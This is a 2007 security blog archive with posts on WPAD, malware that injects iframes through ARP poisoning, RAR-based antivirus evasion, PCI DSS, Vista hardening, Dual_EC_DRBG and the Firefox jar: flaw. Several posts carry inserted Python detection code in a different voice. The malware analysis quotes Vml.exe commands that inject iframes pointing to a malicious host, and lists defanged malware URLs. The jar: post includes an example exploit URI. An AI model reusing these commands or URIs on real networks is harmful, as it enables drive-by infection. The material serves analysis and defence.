November 2007


but “L O L” at Microsoft’s latest security debacle ;)

I think their own advisory from 1999 (!!!) explains the issue pretty well:

The IE 5 Web Proxy Auto-Discovery (WPAD) feature enables web clients to automatically detect proxy settings without user intervention. The algorithm used by WPAD prepends the hostname “wpad” to the fully-qualified domain name and progressively removes subdomains until it either finds a WPAD server answering the domain name or reaches the third-level domain. For instance, web clients in the domain a.b.microsoft.com would query wpad.a.b.microsoft.com, wpad.b.microsoft.com, then wpad.microsoft.com. A vulnerability arises because in international usage, the third-level domain may not be trusted. A malicious user could set up a WPAD server and serve proxy configuration commands of his or her choice.

Well,

too bad they only protected their customers from this if their domains ended in .com, and that this issue has persisted through eight more years of code (how much new code did they say there was in Vista?). This little function seems to have remained unchanged for almost a decade anyhow…

Now let’s hope that Microsoft are faster than the bad guys… And in the meantime:

  • If you have a webfilter, block all addresses containing “wpad.” in them.
  • On most Windows operating systems, stopping the service “WinHTTP Web Proxy Auto-Discovery Service” would also do it, but some people have been having problems with this.
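The search order quoted from the 1999 advisory is easy to reproduce, and doing so shows exactly why a “.com-only” fix is not enough: the last candidate for a client under a country-code domain is a name the organisation does not own. The code below is an added illustration written for this page, not code from the post or from Microsoft; the organisation domain example.co.uk and the DNS log lines are constructed, and the log format (timestamp, client, queried name) is an assumption. It lists the candidates the algorithm produces, flags those outside the organisation’s own domain, and runs the same test over DNS query log lines so a WPAD lookup that leaves the domain can be spotted, which is the monitoring the post recommends until a patch arrives.

```python
import re


def wpad_candidates(fqdn: str, min_labels: int = 2) -> list[str]:
    """Reproduce the WPAD host search from the advisory: prepend "wpad" to the
    client's FQDN, then drop the leftmost label each round until only a
    two-label suffix (the advisory's "third-level domain" with wpad. in front)
    is left."""
    labels = [label for label in fqdn.lower().strip(".").split(".") if label]
    candidates = []
    while len(labels) >= min_labels:
        candidates.append("wpad." + ".".join(labels))
        labels = labels[1:]
    return candidates


def untrusted_candidates(fqdn: str, org_domain: str) -> list[str]:
    """Candidates that fall outside the organisation's own domain. Nobody in
    the organisation controls these names, so a third party who registers one
    can answer the client's WPAD query."""
    suffix = "." + org_domain.lower().strip(".")
    return [c for c in wpad_candidates(fqdn) if not c.endswith(suffix)]


# Constructed DNS query log (not from the post): "<timestamp> <client> <qname>".
SAMPLE_DNS_LOG = """\
2007-11-28T09:00:01 10.0.0.5 wpad.a.b.example.co.uk
2007-11-28T09:00:01 10.0.0.5 wpad.b.example.co.uk
2007-11-28T09:00:02 10.0.0.5 wpad.example.co.uk
2007-11-28T09:00:02 10.0.0.5 wpad.co.uk
2007-11-28T09:00:03 10.0.0.7 www.example.co.uk
"""

WPAD_QNAME = re.compile(r"^wpad\.", re.IGNORECASE)


def flag_wpad_queries(log_text: str, org_domain: str) -> list[tuple[str, str]]:
    """Return (client, qname) pairs for WPAD lookups that leave the org domain.
    A hit means a client is about to ask a name outside the organisation for
    its proxy configuration."""
    suffix = "." + org_domain.lower().strip(".")
    flagged = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip lines that do not match the assumed log format
        _timestamp, client, qname = parts
        if WPAD_QNAME.match(qname) and not qname.lower().endswith(suffix):
            flagged.append((client, qname.lower()))
    return flagged


if __name__ == "__main__":
    print(wpad_candidates("a.b.microsoft.com"))
    print(untrusted_candidates("a.b.example.co.uk", "example.co.uk"))
    print(flag_wpad_queries(SAMPLE_DNS_LOG, "example.co.uk"))
```

For a.b.microsoft.com the function yields the three names the advisory lists and nothing outside microsoft.com; for a client under example.co.uk the final candidate is wpad.co.uk, which is the query the log check reports.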

In other words, keep an eye on your network the next couple of weeks until MS produces a patch.

Cheers and browse safe!

… by the bad guys unfortunately ;)

When investigating one of the files that was being downloaded by the initial dropper from the Kirisun hack I found something very interesting. I do not know if this is a known technique, but it is new to me. The file I was looking at was “24.exe” and the reasons for choosing that one were:

  1. Easy :) Self-extracting RAR, no encryption and no sandbox detection.
  2. It was one of the largest files == lots of goodies?

After running the self-extracting RAR in the sandbox I ended up with the following files in c:\windows\system32\:

[Image: listing of the extracted files (not reproduced in text)]

Inside the “drivers” folder a copy of npf.sys was dropped. This file belongs to the WinPcap project and so does some of the other files that were extracted.

The file that was supposed to auto start after decompression was “3.vbs” whose only job was to silently run “run.bat” which contained the following two lines:

Vml.exe -idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src='hxxp://5.xqhgm.com/2.htm' width=20 height=1></iframe>"
Vml.exe -idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert "<iframe src='hxxp://5.xqhgm.com/2.htm' width=20 height=1></iframe>"
exit

Ok, then what does our little friend Vml.exe do with these parameters, I thought? After asking my friend Google I got the answer I thought I would get: it was performing ARP poisoning on the local network (well, just the two subnets specified in the .bat) and inserting iframes into all websites being viewed. Previously discovered by CISRT earlier in November.

Genius! One point to the bad guys!

… and now have their pages full of malware-infecting and object-dumping <iframe>s.

Tracking the iframes I found a series of different servers hosting the malware and exploits. The flow is as follows:

  • hxxp://boc.sbb22.com/home/index.htm (This is the inserted Iframe)
    • hxxp://boc.sbb22.com/
      • hxxp://aa.llsging.com/ww/new82.htm
        • hxxp://aa.llsging.com/a2/haha.htm
        • hxxp://aa.llsging.com/a2/pps.htm
        • hxxp://js.users.51.la/1299644.js
          • hxxp://vip2.51.la/go.asp
        • hxxp://ww4.tongji123.com/g1.aspx?id=42916235
          • hxxp://ww4.tongji123.com/s.aspx
    • hxxp://nn.mm5208.com/nn.htm
      • Not reachable at the time
    • hxxp://xx.9365.org/
      • hxxp://5.xqhgm.com/sha1.htm
        • hxxp://5.xqhgm.com/new/1.gif (ANI exploit, loads on page).
          • Downloads and runs hxxp://1.xqhgm.com/x.exe
        • hxxp://5.xqhgm.com/new/1.htm (other exploit, not investigated)
          • References hxxp://1.xqhgm.com/x.exe
        • hxxp://5.xqhgm.com/new/2.htm
          • Not reachable at the time
        • hxxp://5.xqhgm.com/new/3.htm
          • Returns empty page
        • hxxp://5.xqhgm.com/new/4.htm
          • Tries to load hxxp://3.xqhgm.com/zs.exe as an object
        • hxxp://s30.cnzz.com/stat.php?id=658703&web_id=658703
          • Seems to be a statistics engine
        • hxxp://js.users.51.la/1402795.js
          • Not reachable at the time
    • hxxp://a.2008yi.com/hu.htm
      • Not reachable at the time
    • hxxp://acc.jqxx.org/ac.htm
      • hxxp://dfs.jfkdlirjnfirpocr.com/web/6619038.htm
        • Not reachable at the time
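The tag that Vml.exe injects (a 20x1 pixel iframe) and the chain above are the kind of thing a proxy or an incident responder wants to pull out of captured pages automatically. The following is an added example written for this page, not code from the post or from any tool it mentions: a small detector built on Python’s html.parser that reports iframes which are sized to be invisible or hidden with CSS, and a defang helper that writes URLs the way the post does. The sample HTML and the hostnames in it are constructed placeholders, and the 20x20 area threshold is an assumption.

```python
from html.parser import HTMLParser


class HiddenIframeFinder(HTMLParser):
    """Collect <iframe> tags whose size or style suggests they are meant to be
    invisible to the user, the shape of the tag injected by run.bat."""

    MAX_AREA = 20 * 20  # assumed threshold: frames this small are not for viewing

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attributes = {name: (value or "") for name, value in attrs}
        reason = self._why_suspicious(attributes)
        if reason:
            self.findings.append({"src": attributes.get("src", ""), "reason": reason})

    def _why_suspicious(self, attributes):
        width = _to_int(attributes.get("width"))
        height = _to_int(attributes.get("height"))
        style = attributes.get("style", "").replace(" ", "").lower()
        if width is not None and height is not None and width * height <= self.MAX_AREA:
            return f"tiny frame {width}x{height}"
        if "display:none" in style or "visibility:hidden" in style:
            return "hidden via style"
        return None


def _to_int(value):
    """Parse "20" or "20px"; anything else counts as unspecified."""
    try:
        return int(str(value).strip().rstrip("px"))
    except (TypeError, ValueError):
        return None


def find_hidden_iframes(html: str) -> list[dict]:
    parser = HiddenIframeFinder()
    parser.feed(html)
    return parser.findings


def defang(url: str) -> str:
    """Write URLs the way the post does so they are not clickable in reports."""
    return url.replace("https://", "hxxps://").replace("http://", "hxxp://")


# Constructed page: one normal video frame plus two injected ones. The
# hostnames are placeholders, not the ones from the post.
SAMPLE_HTML = """
<html><body>
<h1>Some site</h1>
<iframe src="http://video.example.test/player" width="640" height="360"></iframe>
<iframe src='http://injected-1.example.test/2.htm' width=20 height=1></iframe>
<iframe src="http://injected-2.example.test/x.htm" style="display: none"></iframe>
</body></html>
"""


if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE_HTML):
        print(defang(finding["src"]), "-", finding["reason"])
```

Run against the sample page it reports the two injected frames and leaves the full-size video frame alone; each reported src is the next hop to fetch when you walk a chain like the one listed above.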

The primary payload of these iframed pages seems to be “x.exe” and “zs.exe”. When dumping the strings from these executables (no obfuscation used) it becomes apparent that both are droppers for a whole bunch of malware files (possibly the same files, just recompiled/packed/encrypted for AV evasion). The downloads referenced in the files were:

  • hxxp://1.xqhgm.com/1.exe
  • hxxp://1.xqhgm.com/2.exe
  • hxxp://1.xqhgm.com/3.exe
  • hxxp://1.xqhgm.com/4.exe
  • and so on up to…
  • hxxp://1.xqhgm.com/24.exe

File numbers “1” and “16” resulted in a 404 Not Found.

“23.exe” seems to be the same malware that I found some time back (see this post). As said in that post, the main infector does not want to run in my sandbox. Because of that I have not yet been able to get the pcihdd.sys rootkit component, as I do not have a computer to “waste time restoring” atm. If someone would like to infect themselves, contact me for a sample ;)

Another thing linking this infection to the other that I found is the use of the same stats engine, hxxp://s30.cnzz.com/.

Cheers and stay safe !

WARNING: PANDA SECURITY CENTRIC / ANGRY RANTING POST -> See “About this blog”. ;)

Earlier on this month a potential “bug/security implication/design flaw/non-issue?” (the definition is not totally clear in this particular case) was reported to Panda Security by the security firm n.runs.

The issue at hand is that if a RAR file header is formatted in a specific way, the contents of the archive cannot be analyzed by the antivirus kernel and as such might pass through perimeter defenses and actually be written to disk. Since WinRAR is extremely tolerant of illegally formatted archive headers (steganography, anyone?), such an archive can still be opened with WinRAR.

However, if the archive is extracted or if a file is run from it, Panda will have no problems catching it with either the signature-based engine or the behavioural analysis engine. Of course there is also the possibility of us not being able to detect the malware, but then why evade us? Our perimeter products would also catch these kinds of files if not reconfigured from the default (content filter -> Files with inconsistent format, extension or MIME type). However, if these settings have been changed, I see the attack vector more clearly. And of course, even if this is correctly configured it is not good that something can possibly slip by the signature engine.
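The “files with inconsistent format” setting mentioned above is a fail-closed policy: an archive whose headers do not add up is not passed through for the scanner to guess at. To make that concrete, here is an added example written for this page (not Panda’s or n.runs’ code, and not the specific malformation n.runs reported) that walks the RAR 4.x block structure and rejects anything whose header CRC, declared header size or declared data size is inconsistent with the bytes present. The block layout it checks (7-byte common header of CRC, type, flags, size; ADD_SIZE at offset 7 when flag 0x8000 is set; NAME_SIZE at offset 26 of a file header) is the published RAR 4 format; the sample archives are constructed in code so the check can be run without any real archive.

```python
import struct
import zlib

RAR_MARKER = b"Rar!\x1a\x07\x00"   # RAR 4.x marker block
BLOCK_MAIN, BLOCK_FILE = 0x73, 0x74
FLAG_ADD_SIZE = 0x8000              # block is followed by ADD_SIZE bytes of data
FILE_HEADER_FIXED = 32              # 7 common bytes + 25 bytes of fixed file fields


def _block(head_type: int, flags: int, body: bytes, data: bytes = b"") -> bytes:
    """Assemble one block with a correct HEAD_CRC: the low 16 bits of the
    CRC32 over everything in the header after the CRC field itself."""
    head_size = 7 + len(body)
    tail = struct.pack("<BHH", head_type, flags, head_size) + body
    return struct.pack("<H", zlib.crc32(tail) & 0xFFFF) + tail + data


def _file_block(name: bytes, payload: bytes, name_size=None) -> bytes:
    """Stored (method 0x30) file header; name_size can be forced wrong for tests."""
    body = struct.pack(
        "<IIBIIBBHI",
        len(payload), len(payload),          # PACK_SIZE, UNP_SIZE
        2,                                   # HOST_OS: Windows
        zlib.crc32(payload) & 0xFFFFFFFF,    # FILE_CRC
        0, 20, 0x30,                         # FTIME, UNP_VER, METHOD (stored)
        len(name) if name_size is None else name_size,
        0x20,                                # ATTR
    ) + name
    return _block(BLOCK_FILE, FLAG_ADD_SIZE, body, payload)


def build_sample_archive() -> bytes:
    """Constructed, self-consistent archive holding one stored file."""
    main = _block(BLOCK_MAIN, 0, b"\x00\x00" + b"\x00\x00\x00\x00")
    return RAR_MARKER + main + _file_block(b"a.txt", b"hello")


def build_inconsistent_archive() -> bytes:
    """Same archive, but the file header claims a 200-byte name it does not carry."""
    main = _block(BLOCK_MAIN, 0, b"\x00\x00" + b"\x00\x00\x00\x00")
    return RAR_MARKER + main + _file_block(b"a.txt", b"hello", name_size=200)


def check_rar_structure(data: bytes) -> tuple:
    """Fail-closed structural check. Every block header must be complete,
    carry a matching CRC and declare sizes that fit inside the file."""
    if not data.startswith(RAR_MARKER):
        return False, "missing RAR 4.x marker"
    pos = len(RAR_MARKER)
    while pos < len(data):
        if len(data) - pos < 7:
            return False, f"truncated block header at offset {pos}"
        head_crc, head_type, flags, head_size = struct.unpack_from("<HBHH", data, pos)
        if head_size < 7 or pos + head_size > len(data):
            return False, f"bad HEAD_SIZE {head_size} at offset {pos}"
        if zlib.crc32(data[pos + 2:pos + head_size]) & 0xFFFF != head_crc:
            return False, f"header CRC mismatch at offset {pos}"
        data_size = 0
        if flags & FLAG_ADD_SIZE:
            if head_size < 11:
                return False, f"ADD_SIZE flag set but header too short at offset {pos}"
            data_size = struct.unpack_from("<I", data, pos + 7)[0]
        if head_type == BLOCK_FILE:
            if head_size < FILE_HEADER_FIXED:
                return False, f"file header shorter than its fixed fields at offset {pos}"
            name_size = struct.unpack_from("<H", data, pos + 26)[0]
            if head_size < FILE_HEADER_FIXED + name_size:
                return False, f"file header shorter than its declared name at offset {pos}"
        if pos + head_size + data_size > len(data):
            return False, f"packed data runs past end of file at offset {pos}"
        pos += head_size + data_size
    return True, "consistent"


if __name__ == "__main__":
    print(check_rar_structure(build_sample_archive()))
    print(check_rar_structure(build_inconsistent_archive()))
```

The point of the check is the policy, not the parser: a perimeter device that cannot account for every byte of an archive should treat it as inconsistent and stop it, rather than pass it on because a lenient extractor would still open it.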

This issue being reported is not a problem to us. It is a good thing and it enables us to provide better protection as we eliminate potential bypass vectors. What is a problem though (not only for us I think) is irresponsible disclosure. You can see Pedro’s thoughts about this here, but I’d like to share some of my own views as well.

As Pedro points out, most of the security problems reported to Panda by researchers or security companies are handled seriously and in a timely manner. This was also the case this time. In return for the diligence in response time and issue resolution, we do expect the reporting party to follow common policies for public disclosure, especially if the discussion and investigation of the flaw is still in the lab. This is for several reasons including (but not limited to) the security of our customers, the security of our customers (yeah, I wrote that twice), the continued cooperation with the security community in these issues and the open communication style used in these cases.

What n.runs did next while this issue was being investigated and its impact clarified was to publicly disclose the issue complete with technical details. As pointed out in this post by Kurt Wismer there are other issues with the document, but I’ll try to stay out of that discussion. I do however recommend reading his post as he is making some very good points not only in the article but also in the comments that followed.

The timeline for this issue was described in the Panda Research blog as:

Nov. 6: n.runs initial vulnerability report and PoC to Panda
Nov. 7: Panda acknowledges receipt and starts investigating
Nov. 13: n.runs publicly discloses Panda as vulnerable
Nov. 16: Panda sends comments on vulnerability and PoC to n.runs
Nov. 16: n.runs responds to Panda comments (fails to mention the issue is already public)
Nov. 21: Panda sends final response to n.runs

I understand that if you do not have a final response from the vendor in a reasonable time (that not being less than two months if initial contact is established), you might want to release an advisory or two highlighting the issues to pressure the vendor to provide a fix, but come on. That was surely not the case here.

Anyways, after seeing this behaviour I can’t help but wonder what motivated this line in their presentation referenced above:

“The solution developed by n.runs under the code name “ParsingSafe” will build on and work together with the customer antivirus products that are already in place or that are planned to be put in place ….. Based on this, the antivirus vendors are very important technology partners for our solution. The goal of the customer is still primarily to have the highest rate of virus recognition possible …..”

Could someone please explain to me how prematurely disclosing an issue like this can help our customers have “the highest rate of virus recognition possible” because I do not get it. Of course, the statement was regarding the goal of the customer. Not n.runs.

Whatever, my own opinions are probably just being clouded by me working with security professionally for such a long time. I remember back in the days when I was a kid and me and my “31337 h4×0rcr3w” threw out our newfound vulnerabilities as soon as we even saw a whiff of them. That was fun :)

Point made. Have a nice night :)

After my post mentioning the PCI DSS I got some questions like “PCI D..what?” and “What is that anyways? I’ve heard of it but never read anything about it”. Well, after reading this, you people should feel a bit enlightened. Hopefully, CISSPs and similar will not find this as new information, but you might enjoy the refresher. So, read on folks, this is gonna be a (…another) long one.

PCI DSS stands for “Payment Card Industry Data Security Standard” and it was created by the larger players in the credit card business to ensure that those little 1’s and 0’s, which usually reside on your physical magnetic-stripe card, do not end up in the hands of a criminal. The first version of the standard was developed and agreed upon in late 2004 and was (and still is) intended to provide guidance on computer security related issues for organizations that transfer, store or process credit card information. The first standard was revised in 2006 to make it more up-to-date and more relevant to the current situation.

The word “guidance” is used a bit freely in that description if you ask me: if a requirement in the standard is not met by a merchant, he might lose his right to handle the kind of data described in the standard, effectively shutting down his business (this is not a bad thing, btw).

Before the PCI DSS was widely agreed upon, many of the credit card companies had their own standards and recommendations regarding data security, such as CISP/AIS (Visa), SDP (MasterCard), DSOP (AmEx), I&C (Discover) and DSP (JCB). The above mentioned were also the primary participants in the discussion that later led to the standard. Most of these financial actors still have their own security programs, but they have aligned them so that they all have the same objective: helping merchants become PCI DSS compliant.

The PCI Data Security Standard consists of 12 topics in 6 different categories. These are called “control objectives” and are:

  • Build and maintain a Secure Network
    • Requirement 1: Install and maintain a firewall configuration to protect cardholder data
    • Requirement 2: Do not use vendor-supplied defaults for system passwords and other security parameters
  • Protect Cardholder Data
    • Requirement 3: Protect stored cardholder data
    • Requirement 4: Encrypt transmission of cardholder data across open, public networks
  • Maintain a Vulnerability Management Program
    • Requirement 5: Use and regularly update anti-virus software
    • Requirement 6: Develop and maintain secure systems and applications
  • Implement Strong Access Control Measures
    • Requirement 7: Restrict access to cardholder data by business need-to-know
    • Requirement 8: Assign a unique ID to each person with computer access
    • Requirement 9: Restrict physical access to cardholder data
  • Regularly Monitor and Test Networks
    • Requirement 10: Track and monitor all access to network resources and cardholder data
    • Requirement 11: Regularly test security systems and processes
  • Maintain an Information Security Policy
    • Requirement 12: Maintain a policy that addresses information security

In order to verify whether or not the merchants/service providers are really compliant they have to undergo self-assessments, quarterly PCI Security Scans and possibly PCI Security Audits (Depending on the size and amount of sensitive information handled).

The PCI Security Scans are to be performed by an ASV (Approved Scanning Vendor) and are non-intrusive in nature. This means that the scans should not interrupt day-to-day business or cause any damage to the systems evaluated. After one of these scans the ASV compiles a report detailing the different issues found and the associated risk (you will need a CISSP for this ;) ) and also provides some guidance on how to remedy the issues. Every weakness found should also be categorised on a scale from one to five, five being the worst case scenario. The PCI DSS considers levels 3 to 5 as a failure to comply and a direct danger to cardholder data. This type of scan was the topic of discussion in the webinar that I based my previous related post on.

If you are a large merchant or service provider you might also be the subject of a PCI Security Audit, which consists of a review of internal policies & documentation, internal penetration testing & security evaluation and also interviews of selected personnel. This is done to actually verify that all guidelines in the PCI DSS have been implemented as they should be.

One very interesting document regarding both types of audits was written in late 2006 by consultants from the German security company SRC. In that document (which contains a lot of good info) they listed the top 10 types of vulnerabilities found for both methods (internal/external). What’s very serious about the ones they listed is that they are very old. For example, I used one of them to compromise a network in 2002! This kind of vulnerability should not be present in any company that seriously tries to be secure. No matter the size. They are easily scanned for and can be exploited in under one minute. You can find the whole document here.

Other references on this subject:

PCI Security Standards

PCI Answers - This post was very interesting.

PCI Answers PCI Forum

PCI DSS News and Information

IT Governance PCI DSS information

Google…

That’s it for me now. If I’m mistaken about something or if someone has any questions please drop me a comment or an e-mail!

Cheers,

I’m not an advocate or fan of Microsoft’s technology, implementation of standards or politics. That’s for sure. However, this is actually really interesting for those of us that are stuck in our corporate environment with Windows:

I was recently visiting a larger company in Sweden that is in the testing stage of a large deployment of Windows Vista. This deployment will be done on a pretty big userbase that has somewhat special security demands and for that reason they are following the SSLF (or SS-LF) baseline presented by Microsoft in the Windows Vista Security Guide. In that same guide you will also find information about a lighter security model called Enterprise Client (EC). The EC-baseline provides a more simple and less intrusive security baseline but it did not fill the requirements for this particular company.

I was quite impressed with the work they had done and how well it seems to have turned out, and decided to read up on these baselines. I mean, more security for Windows systems is not a bad thing, and if you can do this easily then it would be great.

The definition of the two baselines in the Windows Vista Security Guide are:

  • Enterprise Client (EC). Client computers in this environment are located in a domain that uses Active Directory and only need to communicate with systems running Windows Server 2003. The client computers in this environment include a mixture: some run Windows Vista whereas others run Windows XP….
  • Specialized Security – Limited Functionality (SSLF). Concern for security in this environment is so great that a significant loss of functionality and manageability is acceptable. For example, military and intelligence agency computers operate in this type of environment. The client computers in this environment run only Windows Vista…”

The whole process of securing the clients is done via Active Directory group policies, and the implementation of these can be very much simplified by using pre-made scripts (also included in the security guide).

The main downside for me with this policy (SSLF) is that it might cause a minor conflict with the brand new “Panda For Desktops” (formerly known as ClientShield) but there is an easy remedy for that particular problem. Guess why I was there btw ;) hehe…

Here is a short list of resources for more information:

And as a bonus, the delicious, the enormously useful (as not many run on an SSLF baseline) but also quite CTO friendly:

This should be a prerequisite for all administrators running a 100+ user network. It sure would make my life a hell of a lot easier during intrusion investigations ;)

Cheers and drive safe (winter in Sweden now) !

Bruce Schneier on one of the “Deterministic Random Bit Generators” supplied by the U.S. government:

“But today there’s an even bigger stink brewing around Dual_EC_DRBG. In an informal presentation (.pdf) at the CRYPTO 2007 conference in August, Dan Shumow and Niels Ferguson showed that the algorithm contains a weakness that can only be described as a backdoor.”

To borrow the author’s own common phrasing: this is a big deal.

Find the whole article here.


For those of you that have not been following the computer security news and blogs, there is a new vulnerability in town, and it’s nasty.

The problem lies in the jar: protocol implementation used by Firefox. It enables an attacker to conduct XSS and gives them almost limitless possibilities for malware hosting.

This is an example URI which exploits the issue:

jar:http://www.icmpecho.com/myjarshrine/yarihooo.jpg!/malwareloadingscript.html
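A jar: URI has two parts: the wrapped resource before the “!/” and the entry inside that archive after it. A filter that only looks for the literal string “jar:” learns nothing about either, which is part of why the advisories discussed below are of so little use. The parser here is an added example written for this page, not code from Firefox, NoScript or any of the posts referenced; it splits the URI from the example above into its parts and reports what a content filter would actually want to know: that the archive is being served under a non-archive name (.jpg) and that the entry is active web content. The archive-suffix list and the “active content” suffix list are assumptions.

```python
from urllib.parse import urlsplit

# The URI from the post (the author's own domain).
EXAMPLE_URI = "jar:http://www.icmpecho.com/myjarshrine/yarihooo.jpg!/malwareloadingscript.html"

ARCHIVE_SUFFIXES = (".jar", ".zip")          # assumed: names an archive is expected to have
ACTIVE_SUFFIXES = (".html", ".htm", ".js")    # assumed: entries that run in the browser


def parse_jar_uri(uri: str) -> dict:
    """Split jar:<inner-url>!/<entry> into its parts, refusing anything that
    does not wrap an absolute http(s) URL or lacks the entry separator."""
    if not uri.lower().startswith("jar:"):
        raise ValueError("not a jar: URI")
    inner, separator, entry = uri[4:].partition("!/")
    if not separator:
        raise ValueError("jar: URI without '!/' entry separator")
    parts = urlsplit(inner)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        raise ValueError("wrapped resource is not an absolute http(s) URL")
    return {
        "inner_url": inner,
        "host": parts.hostname,
        "path": parts.path,
        "entry": entry,
    }


def is_jar_uri(uri: str) -> bool:
    """True when the string is a well-formed jar: URI by the rules above."""
    try:
        parse_jar_uri(uri)
    except ValueError:
        return False
    return True


def jar_uri_findings(uri: str) -> list[str]:
    """What a content filter should look at instead of the literal 'jar:' text:
    the wrapped resource and the entry being pulled out of it."""
    info = parse_jar_uri(uri)
    findings = []
    if not info["path"].lower().endswith(ARCHIVE_SUFFIXES):
        findings.append(f"archive served under a non-archive name: {info['path']}")
    if info["entry"].lower().endswith(ACTIVE_SUFFIXES):
        findings.append(f"entry is active web content: {info['entry']}")
    return findings


if __name__ == "__main__":
    print(parse_jar_uri(EXAMPLE_URI))
    for finding in jar_uri_findings(EXAMPLE_URI):
        print("-", finding)
```

Note what this does not do: it inspects one URI in isolation and says nothing about the page that loaded it, which is exactly the gap the post goes on to describe.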

Now, instead of copying others work which they have probably spent hours or more on to explain the issue in full, I’ll give you a short recap of the happenings and more and more exposing blog posts:

2007-02-08 - Jesse Ruderman logs the bug in the Mozilla bugzilla tracker. It remains unpatched and not widely known until…
2007-11-07 - Researcher pdp discusses the issue and potential impact at GNUCitizen. This opens this bug up to a whole new audience and…
2007-11-10 - Beford illustrates the seriousness of this issue and issues in the same family by targeting Google and Gmail and posts a new bug entry.
2007-11-10 - And then Mario posts at GNUCitizen about other attack vectors including malware- and exploit-hosting.

During these last days we have also seen some very strange recommendations from leading security experts at ZDNet, Secunia and US-CERT (and one at The Register as well) as the most excellent Giorgio over at the Hackademix blog.

The problem with the recommendations given by these persons and/or organisations is mainly that they recommend blocking URIs containing “jar:” in web filters and deep-packet-inspecting firewalls, or avoiding following “jar:” links. You should understand why this would be a total waste of time if you have read the above articles and in particular Giorgio’s comments on the issue.

Also, you should know why if you have ever seen one page load another, like in most web-based exploits (including the one on the Swedish Parliament’s websites this week (Swedish link, sorry)). My feeling is that the first advisories were rushed out “to be first in the corporate sector” and sloppy research took its toll.

If you do want to protect yourselves for real, you might wanna download and install the NoScript extension for Firefox, which also handles jar:.

Happy times! ;)

Last week I held an on-demand seminar out at a company in Stockholm, Sweden.

This is my retelling of that seminar. I wrote this down mostly for my own sake, for learning and seeing the areas in which I had to improve in order to be clearer to the non-technical people that are on the other end of my message being transmitted.

The CTO of the company had asked us to help him educate his users on their responsibilities when it comes to keeping a network secure, and what potential harm they could cause themselves and the company if not doing so.

This is the never-ending problem: educating users. So how did I go about re-inventing the wheel?
I started out by presenting six simple questions and statements:

  • Do you think that the information in your home computer is valuable?
  • Do you think that your home computer is adequately protected from viruses and other kinds of malware?
  • Do you think that the information in your work computer is valuable?
  • Do you think that your work computer is adequately protected from viruses and other kinds of malware?
  • Is the statement “There is less malware today than two years ago” true or false?
  • Is the statement “There is less risk for getting infected now than two years ago” true or false?

I asked the participants to consider the questions and statements and keep their answers in their head. Of course, they might have understood that a person from an anti-malware vendor might have a hidden agenda in these questions ;)

After this I presented some of the results from an internal study that concludes that most users of our anti-malware solutions think that the two last statements are true. That is, they think that there is less malware in the world and that there is less risk of getting infected now than two years ago.

I then continued on to talk about how this is fundamentally wrong and backed that up with the statistics from PandaLabs and the recent “InfectedOrNot” survey of home users’ computers. I did not mention the corporate study, but if you are interested you can find both of these at Panda Security’s Research blog.

This study (of home users) is based on 1.5 million PCs that were scanned with the online service www.infectedornot.com between May and July 2007. Among other things it concludes that out of all scanned computers with running and up-to-date antivirus software, almost 23% have active malware on their system. That is almost 1 in 4.

Why is this? Well, one thing that is largely responsible for this situation is the change in the objective and goal of the malware of today. Just a couple of years ago there were no banking or credit card logging trojans, no spam-enabling botnets etc. Back then it was all about fame for the author, and that made it very easy for us antivirus guys. Today we are seeing a lot of new malware pop up, and a large amount of it is created with only one goal in mind, and that is financial gain for the creators. And as we all know, where there is money coming in there is money spent, and what we are seeing today are professional malware writers making a business out of it. They have business plans and whole development cycles, and they spend a lot of resources on pumping out variations on their goods to avoid the anti-malware radar. The “Storm worm” is a good and quite obvious example of this.
Of course this flood of variations of the same malware creates a lot of strain on our (Panda Security’s) and other vendors’ virus labs and forces us to either become selective, or to have a huge backlog of malware. Up until recently this was the situation for us.

We have had to adapt to this situation more and more during the last couple of years and we are finally catching up thanks to different things. First, we have increased the amount of automated processes and minimized the human factor in malware analysis, and second, we have created and implemented new technology that helps us to proactively detect and report potential threats (TruPrevent). Other new technology such as our “Collective Intelligence” also helps in detecting new malware families at an early stage.

Anyways, the end result of this massive onslaught of new modifications is that we (all security vendors) are bound to miss at least one which in many cases leads to a user being compromised in one way or another.

Now I turned the focus to where the real impact is, and that is: who is the target and who is the victim?

As the motivation behind the malware has changed, it is more than ever the actual user behind the keyboard that is the target. It is her information, her payment cards, her banking info and it is her computer that the malware authors want to use in DDoS attacks and other criminal activities.

This is very important for the average user to understand because if they do not, they will not think before they act and will fall prey to the criminal gangs of the digital world (OMG, that sounded like a SecurityFocus line ;) hehe).

OK, so what can the user do to secure his computer against these different kinds of threats? Well, as a start you (the user) should make sure that the following four bases are covered:

  • Check that your computer is up to date
  • Check that you have an anti-malware solution installed
    • And turn on all protection modules, they are there for a reason
  • Check that your anti-malware solution is up to date
    • If it’s not, it is almost useless
  • Check that you have a firewall installed
    • If not included in your anti-malware, use XP/Vista’s builtin firewall

However, as I mentioned in the start of this article, there will be things that can slip through. So what do we do next? How do we protect ourselves from threats that even the largest companies that offer protection cannot touch? Many times this is just a matter of:

Sound reason & Knowledge

I then continued on to illustrate what sound reason is when you browse the internet, use your e-mail and use communities or instant messaging. In this section I talked about issues such as attached files or file transfers from unknown users or senders, and why you should not just click Yes/I Accept/Next without reading and seriously considering why you are being asked. I also discussed the social issues and identity security issues posed by sites like MySpace and in particular Facebook. You know, the real essentials of this whole seminar: what you really, really should not do when being asked to do something; to use your sound reason.

And then we have the “Knowledge” part. How do you teach a user to behave in a secure way and recognise indicators of foul play in 10-15 minutes? Quite hard, wouldn’t you say? ;) I reasoned like this: knowledge is part experience and part theory. If you have seen someone get their machine infected in some way or another then it is highly unlikely that you will repeat the same mistake (or… hopefully it’s “highly unlikely”). So I decided that the best way to teach users what to avoid was to actually show them some of the warnings they should pay special attention to and also demonstrate some social engineering tricks used by malware today.

One of the examples that worked best was a login page for a large Swedish bank which I had modified to “ring alarm bells” by faking an invalid SSL certificate. I then named that slide “The internet banking service - Find the error”.

No one was able to spot the error.

And I was even using Vista, which showed the whole address bar in red with a big “Certificate Error” shield at the end. Anyhow, I went on to tell them why this was a bad thing, and from now on they are probably going to pay more attention to these kinds of errors.

